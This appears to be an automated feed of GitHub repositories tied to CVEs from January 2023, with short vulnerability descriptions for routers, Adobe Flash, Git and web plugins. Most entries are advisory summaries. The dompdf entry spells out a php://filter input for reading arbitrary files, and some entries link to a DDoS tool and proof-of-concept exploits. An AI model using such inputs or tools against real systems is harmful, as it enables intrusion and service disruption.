**Several stack-based buffer overflow vulnerabilities exist in the DetranCLI command parsing functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network packet can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.This buffer ove CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40991](https://github.com/Live-Hack-CVE/CVE-2022-40991) create time: 2023-01-26T23:33:25Z

**Several stack-based buffer overflow vulnerabilities exist in the DetranCLI command parsing functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network packet can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.This buffer ove CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40990](https://github.com/Live-Hack-CVE/CVE-2022-40990) create time: 2023-01-26T23:33:21Z

**Several stack-based buffer overflow vulnerabilities exist in the DetranCLI command parsing functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network packet can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.This buffer ove CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40986](https://github.com/Live-Hack-CVE/CVE-2022-40986) create time: 2023-01-26T23:33:17Z

**Several stack-based buffer overflow vulnerabilities exist in the DetranCLI command parsing functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network packet can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.This buffer ove CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40987](https://github.com/Live-Hack-CVE/CVE-2022-40987) create time: 2023-01-26T23:33:13Z

**Several stack-based buffer overflow vulnerabilities exist in the DetranCLI command parsing functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network packet can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.This buffer ove CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40985](https://github.com/Live-Hack-CVE/CVE-2022-40985) create time: 2023-01-26T23:33:10Z

**A directory traversal vulnerability exists in the httpd delfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary file deletion. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40701](https://github.com/Live-Hack-CVE/CVE-2022-40701) create time: 2023-01-26T23:33:06Z

**An OS command injection vulnerability exists in the httpd txt/restore.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to arbitrary command execution. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40220](https://github.com/Live-Hack-CVE/CVE-2022-40220) create time: 2023-01-26T23:33:02Z

**A stack-based buffer overflow vulnerability exists in the httpd downfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38459](https://github.com/Live-Hack-CVE/CVE-2022-38459) create time: 2023-01-26T23:32:58Z

**A leftover debug code vulnerability exists in the httpd shell.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38715](https://github.com/Live-Hack-CVE/CVE-2022-38715) create time: 2023-01-26T23:32:54Z

**A directory traversal vulnerability exists in the httpd downfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary file read. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38088](https://github.com/Live-Hack-CVE/CVE-2022-38088) create time: 2023-01-26T23:32:50Z

**A stack-based buffer overflow vulnerability exists in the httpd delfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36279](https://github.com/Live-Hack-CVE/CVE-2022-36279) create time: 2023-01-26T23:32:46Z

**Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-102 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-1029](https://github.com/Live-Hack-CVE/CVE-2016-1029) create time: 2023-01-26T21:21:30Z

**Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-102 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-1027](https://github.com/Live-Hack-CVE/CVE-2016-1027) create time: 2023-01-26T21:21:26Z

**Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-102 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-1026](https://github.com/Live-Hack-CVE/CVE-2016-1026) create time: 2023-01-26T21:21:23Z

**Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-102 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-1028](https://github.com/Live-Hack-CVE/CVE-2016-1028) create time: 2023-01-26T21:21:19Z

**Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-102 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-1025](https://github.com/Live-Hack-CVE/CVE-2016-1025) create time: 2023-01-26T21:21:15Z

**Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4125](https://github.com/Live-Hack-CVE/CVE-2016-4125) create time: 2023-01-26T21:21:11Z

**Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4126](https://github.com/Live-Hack-CVE/CVE-2016-4126) create time: 2023-01-26T21:21:07Z

**Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4127](https://github.com/Live-Hack-CVE/CVE-2016-4127) create time: 2023-01-26T21:21:03Z

**Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4128](https://github.com/Live-Hack-CVE/CVE-2016-4128) create time: 2023-01-26T21:20:59Z

**dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-2383](https://github.com/Live-Hack-CVE/CVE-2014-2383) create time: 2023-01-26T18:04:46Z

**no description** : [Relativ3Pa1n/CVE-2014-2383-LFI-to-RCE-Escalation](https://github.com/Relativ3Pa1n/CVE-2014-2383-LFI-to-RCE-Escalation) create time: 2023-01-26T18:01:50Z

**Use-after-free vulnerability in the Transform object implementation in Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code via a flash.geom.Matrix callback, a different vulnerability than CVE-2016-10 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-1016](https://github.com/Live-Hack-CVE/CVE-2016-1016) create time: 2023-01-26T18:05:13Z

**A flaw was found in the openstack-barbican component. This issue allows an access policy bypass via a query string when accessing the API. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3100](https://github.com/Live-Hack-CVE/CVE-2022-3100) create time: 2023-01-26T18:05:09Z

**An issue was discovered in FC46-WebBridge on GE Grid Solutions MS3000 devices before 3.7.6.25p0_3.2.2.17p0_4.7p0. Direct access to the API is possible on TCP port 8888 via programs located in the cgi-bin folder without any authentication. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43976](https://github.com/Live-Hack-CVE/CVE-2022-43976) create time: 2023-01-26T18:04:59Z

**An issue was discovered on GE Grid Solutions MS3000 devices before 3.7.6.25p0_3.2.2.17p0_4.7p0. The debug port accessible via TCP (a qconn service) lacks access control. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43977](https://github.com/Live-Hack-CVE/CVE-2022-43977) create time: 2023-01-26T18:04:55Z

**TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the username parameter in the setting/setOpenVpnCertGenerationCfg function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48126](https://github.com/Live-Hack-CVE/CVE-2022-48126) create time: 2023-01-26T18:04:38Z

**TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the dayvalid parameter in the setting/delStaticDhcpRules function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48122](https://github.com/Live-Hack-CVE/CVE-2022-48122) create time: 2023-01-26T18:04:34Z

**TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the rsabits parameter in the setting/delStaticDhcpRules function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48121](https://github.com/Live-Hack-CVE/CVE-2022-48121) create time: 2023-01-26T18:04:31Z

**TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the password parameter in the setting/setOpenVpnCertGenerationCfg function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48125](https://github.com/Live-Hack-CVE/CVE-2022-48125) create time: 2023-01-26T18:04:27Z

**TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the FileName parameter in the setting/setOpenVpnCertGenerationCfg function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48124](https://github.com/Live-Hack-CVE/CVE-2022-48124) create time: 2023-01-26T18:04:23Z

**TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the servername parameter in the setting/delStaticDhcpRules function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48123](https://github.com/Live-Hack-CVE/CVE-2022-48123) create time: 2023-01-26T18:04:19Z

**A vulnerability exists in Trend Micro Maximum Security 2022 (17.7) wherein a low-privileged user can write a known malicious executable to a specific location and in the process of removal and restoral an attacker could replace an original folder with a mount point to an arbitrary location, allowing a escalation of pri CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48191](https://github.com/Live-Hack-CVE/CVE-2022-48191) create time: 2023-01-26T18:04:16Z

**A vulnerability in the web-based management interface of Cisco Identity Services Engine could allow an authenticated, remote attacker to inject arbitrary commands on the underlying operating system. This vulnerability is due to improper validation of user input within requests as part of the web-based management interf CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20964](https://github.com/Live-Hack-CVE/CVE-2022-20964) create time: 2023-01-26T18:04:12Z

**Cross-site Scripting (XSS) - Generic in GitHub repository builderio/qwik prior to 0.1.0-beta5. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0410](https://github.com/Live-Hack-CVE/CVE-2023-0410) create time: 2023-01-26T18:05:04Z

**The Birthday attack against 64-bit block ciphers flaw (CVE-2016-2183) was reported for the health checks port (9979) on etcd grpc-proxy component. Even though the CVE-2016-2183 has been fixed in the etcd components, to enable periodic health checks from kubelet, it was necessary to open up a new port (9979) on etcd grp CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0296](https://github.com/Live-Hack-CVE/CVE-2023-0296) create time: 2023-01-26T18:04:51Z

**A proof of concept exploit for a wordpress media library vulnerability** : [0xRar/CVE-2021-29447-PoC](https://github.com/0xRar/CVE-2021-29447-PoC) create time: 2023-01-24T16:43:13Z

**Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code by leveraging an unspecified "type confusion," a different vulnerability than CVE-2016-4224 and CVE-2016-4225. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4223](https://github.com/Live-Hack-CVE/CVE-2016-4223) create time: 2023-01-26T15:55:07Z

**Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code by leveraging an unspecified "type confusion," a different vulnerability than CVE-2016-4223 and CVE-2016-4225. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4224](https://github.com/Live-Hack-CVE/CVE-2016-4224) create time: 2023-01-26T15:55:02Z

**Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code by leveraging an unspecified "type confusion," a different vulnerability than CVE-2016-4223 and CVE-2016-4224. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4225](https://github.com/Live-Hack-CVE/CVE-2016-4225) create time: 2023-01-26T15:54:54Z

**Use-after-free vulnerability in the LoadVars.decode function in Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-1011, CVE-2016-101 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-1017](https://github.com/Live-Hack-CVE/CVE-2016-1017) create time: 2023-01-26T15:54:43Z

**Use-after-free vulnerability in Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-1011, CVE-2016-1013, CVE-2016-1016, and CVE-2016-1 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-1031](https://github.com/Live-Hack-CVE/CVE-2016-1031) create time: 2023-01-26T15:54:39Z

**Use-after-free vulnerability in Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-4173, CVE-2016-4174, CVE-2016-4222, CVE-2016-4227, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4226](https://github.com/Live-Hack-CVE/CVE-2016-4226) create time: 2023-01-26T15:54:34Z

**Use-after-free vulnerability in Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-1013, CVE-2016-1016, CVE-2016-1017, and CVE-2016-1 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-1011](https://github.com/Live-Hack-CVE/CVE-2016-1011) create time: 2023-01-26T15:54:28Z

**Use-after-free vulnerability in Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-1011, CVE-2016-1016, CVE-2016-1017, and CVE-2016-1 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-1013](https://github.com/Live-Hack-CVE/CVE-2016-1013) create time: 2023-01-26T15:54:24Z

**Sewio’s Real-Time Location System (RTLS) Studio version 2.0.0 up to and including version 2.6.2 is vulnerable to improper input validation of user input to several modules and services of the software. This could allow an attacker to delete arbitrary files and cause a denial-of-service condition. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47917](https://github.com/Live-Hack-CVE/CVE-2022-47917) create time: 2023-01-26T15:55:11Z

**Git is distributed revision control system. gitattributes are a mechanism to allow defining attributes for paths. These attributes can be defined by adding a `.gitattributes` file to the repository, which contains a set of file patterns and the attributes that should be set for paths matching this pattern. When parsing CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23521](https://github.com/Live-Hack-CVE/CVE-2022-23521) create time: 2023-01-26T15:54:58Z

**Inconsistent handling of error cases in bluetooth hci may lead to a double free condition of a network buffer. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3806](https://github.com/Live-Hack-CVE/CVE-2022-3806) create time: 2023-01-26T15:54:47Z

**A malicious / defective bluetooth controller can cause buffer overreads in the most functions that process HCI command responses. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0396](https://github.com/Live-Hack-CVE/CVE-2023-0396) create time: 2023-01-26T15:54:51Z

**vulnerabilities, CVE-2022-41903, and CVE-2022-23521, that affect versions 2.39 and older. Git for Windows was also patched to address an additional, Windows-specific issue known as CVE-2022-41953.** : [sondermc/git-cveissues](https://github.com/sondermc/git-cveissues) create time: 2023-01-26T08:34:53Z

**Use-after-free vulnerability in Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-4173, CVE-2016-4174, CVE-2016-4222, CVE-2016-4226, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4227](https://github.com/Live-Hack-CVE/CVE-2016-4227) create time: 2023-01-25T23:22:13Z

**Use-after-free vulnerability in Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-4173, CVE-2016-4174, CVE-2016-4222, CVE-2016-4226, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4228](https://github.com/Live-Hack-CVE/CVE-2016-4228) create time: 2023-01-25T23:22:09Z

**Use-after-free vulnerability in Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-4173, CVE-2016-4174, CVE-2016-4222, CVE-2016-4226, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4229](https://github.com/Live-Hack-CVE/CVE-2016-4229) create time: 2023-01-25T23:22:06Z

**Use-after-free vulnerability in Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-4173, CVE-2016-4174, CVE-2016-4222, CVE-2016-4226, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4230](https://github.com/Live-Hack-CVE/CVE-2016-4230) create time: 2023-01-25T23:22:02Z

**Use-after-free vulnerability in Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-4173, CVE-2016-4174, CVE-2016-4222, CVE-2016-4226, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4248](https://github.com/Live-Hack-CVE/CVE-2016-4248) create time: 2023-01-25T23:21:58Z

**Use-after-free vulnerability in Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-4173, CVE-2016-4174, CVE-2016-4222, CVE-2016-4226, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4231](https://github.com/Live-Hack-CVE/CVE-2016-4231) create time: 2023-01-25T23:21:54Z

**Use-after-free vulnerability in Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-4173, CVE-2016-4174, CVE-2016-4226, CVE-2016-4227, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4222](https://github.com/Live-Hack-CVE/CVE-2016-4222) create time: 2023-01-25T23:21:51Z

**Use-after-free vulnerability in Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-4173, CVE-2016-4174, CVE-2016-4222, CVE-2016-4226, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-7020](https://github.com/Live-Hack-CVE/CVE-2016-7020) create time: 2023-01-25T23:21:47Z

**An issue was discovered in OpenStack Swift before 2.28.1, 2.29.x before 2.29.2, and 2.30.0. By supplying crafted XML files, an authenticated user may coerce the S3 API into returning arbitrary file contents from the host server, resulting in unauthorized read access to potentially sensitive data. This impacts both s3ap CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47950](https://github.com/Live-Hack-CVE/CVE-2022-47950) create time: 2023-01-25T23:22:22Z

**Cross site scripting (XSS) vulnerability in Hundredrabbits Left 7.1.5 for MacOS allows attackers to execute arbitrary code via file names. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45557](https://github.com/Live-Hack-CVE/CVE-2022-45557) create time: 2023-01-25T22:16:36Z

**EyouCMS <= 1.6.0 was discovered a reflected-XSS in the FileManager component in GET parameter "filename" when editing any file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45542](https://github.com/Live-Hack-CVE/CVE-2022-45542) create time: 2023-01-25T22:16:32Z

**Cross site scripting (XSS) vulnerability in Hundredrabbits Left 7.1.5 for MacOS allows attackers to execute arbitrary code via the meta tag. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45558](https://github.com/Live-Hack-CVE/CVE-2022-45558) create time: 2023-01-25T22:16:28Z

**Sewio’s Real-Time Location System (RTLS) Studio version 2.0.0 up to and including version 2.6.2 is vulnerable to improper input validation of user input to the service_start, service_stop, and service_restart modules of the software. This could allow an attacker to start, stop, or restart arbitrary services running on CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43455](https://github.com/Live-Hack-CVE/CVE-2022-43455) create time: 2023-01-25T22:16:21Z

**keycloak: path traversal via double URL encoding. A flaw was found in Keycloak, where it does not properly validate URLs included in a redirect. An attacker can use this flaw to construct a malicious request to bypass validation and access other URLs and potentially sensitive information within the domain or possibly c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3782](https://github.com/Live-Hack-CVE/CVE-2022-3782) create time: 2023-01-25T22:16:05Z

**wildfly-elytron: possible timing attacks via use of unsafe comparator. A flaw was found in Wildfly-elytron. Wildfly-elytron uses java.util.Arrays.equals in several places, which is unsafe and vulnerable to timing attacks. To compare values securely, use java.security.MessageDigest.isEqual instead. This flaw allows an a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3143](https://github.com/Live-Hack-CVE/CVE-2022-3143) create time: 2023-01-25T22:16:01Z

**DDoS Tool which exploits vulnerability CVE-2004-2449 from vendor GameSpy (now known as OpenSpy). User is prompted for input IP address, and port. (NOTE: Please use this responsibly, I made this as a proof of concept of vulnerability exploitation ONLY. I do not endorse DOSing, DDoSing, or cheating in any way. Use this at your own risk.)** : [ParallelVisions/DoSTool](https://github.com/ParallelVisions/DoSTool) create time: 2023-01-25T20:57:22Z

**A vulnerability was found in melnaron mel-spintax. It has been rated as problematic. Affected by this issue is some unknown functionality of the file lib/spintax.js. The manipulation of the argument text leads to inefficient regular expression complexity. The name of the patch is 37767617846e27b87b63004e30216e8f919637d CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-25077](https://github.com/Live-Hack-CVE/CVE-2018-25077) create time: 2023-01-25T20:05:23Z

**A vulnerability has been found in youngerheart nodeserver and classified as critical. Affected by this vulnerability is an unknown functionality of the file nodeserver.js. The manipulation leads to path traversal. The name of the patch is c4c0f0138ab5afbac58e03915d446680421bde28. It is recommended to apply a patch to f CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36651](https://github.com/Live-Hack-CVE/CVE-2020-36651) create time: 2023-01-25T20:05:19Z

**The Show All Comments WordPress plugin before 7.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4295](https://github.com/Live-Hack-CVE/CVE-2022-4295) create time: 2023-01-25T20:05:30Z

**Tiki before 24.1, when the Spreadsheets feature is enabled, allows lib/sheet/grid.php PHP Object Injection because of an unserialize call. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22850](https://github.com/Live-Hack-CVE/CVE-2023-22850) create time: 2023-01-25T20:05:15Z

**An unauthorized user with network access and the decryption key could decrypt sensitive data, such as usernames and passwords. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38469](https://github.com/Live-Hack-CVE/CVE-2022-38469) create time: 2023-01-25T17:54:47Z

**The LISTSERV 17 web interface allows remote attackers to conduct Insecure Direct Object References (IDOR) attacks via a modified email address in a wa.exe URL. The impact is unauthorized modification of a victim's LISTSERV account. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40319](https://github.com/Live-Hack-CVE/CVE-2022-40319) create time: 2023-01-25T17:54:31Z

**A privilege escalation flaw was found in Ceph. Ceph-crash.service allows a local attacker to escalate privileges to root in the form of a crash dump, and dump privileged information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3650](https://github.com/Live-Hack-CVE/CVE-2022-3650) create time: 2023-01-25T17:54:25Z

**An unauthorized user could be able to read any file on the system, potentially exposing sensitive information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43494](https://github.com/Live-Hack-CVE/CVE-2022-43494) create time: 2023-01-25T17:54:16Z

**An unauthorized user could possibly delete any file on the system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46331](https://github.com/Live-Hack-CVE/CVE-2022-46331) create time: 2023-01-25T17:54:12Z

**Vulnerability in the MySQL Cluster product of Oracle MySQL (component: Cluster: Internal Operations). Supported versions that are affected are 7.4.38 and prior, 7.5.28 and prior, 7.6.24 and prior and 8.0.31 and prior. Difficult to exploit vulnerability allows high privileged attacker with access to the physical commu CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21860](https://github.com/Live-Hack-CVE/CVE-2023-21860) create time: 2023-01-25T17:54:52Z

**IBM QRadar SIEM 7.4 and 7.5copies certificate key files used for SSL/TLS in the QRadar web user interface to managed hosts in the deployment that do not require that key. IBM X-Force ID: 244356. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22875](https://github.com/Live-Hack-CVE/CVE-2023-22875) create time: 2023-01-25T17:54:36Z

**Deno is a runtime for JavaScript and TypeScript that uses V8 and is built in Rust. Multi-threaded programs were able to spoof interactive permission prompt by rewriting the prompt to suggest that program is waiting on user confirmation to unrelated action. A malicious program could clear the terminal screen after permi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22499](https://github.com/Live-Hack-CVE/CVE-2023-22499) create time: 2023-01-25T17:54:21Z

**Git is distributed revision control system. `git log` can display commits in an arbitrary format using its `--format` specifiers. This functionality is also exposed to `git archive` via the `export-subst` gitattribute. When processing the padding operators, there is a integer overflow in `pretty.c::format_and_pad_commi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41903](https://github.com/Live-Hack-CVE/CVE-2022-41903) create time: 2023-01-25T15:41:52Z

**The WP Video Lightbox WordPress plugin before 1.9.7 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as adm CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4465](https://github.com/Live-Hack-CVE/CVE-2022-4465) create time: 2023-01-25T15:41:48Z

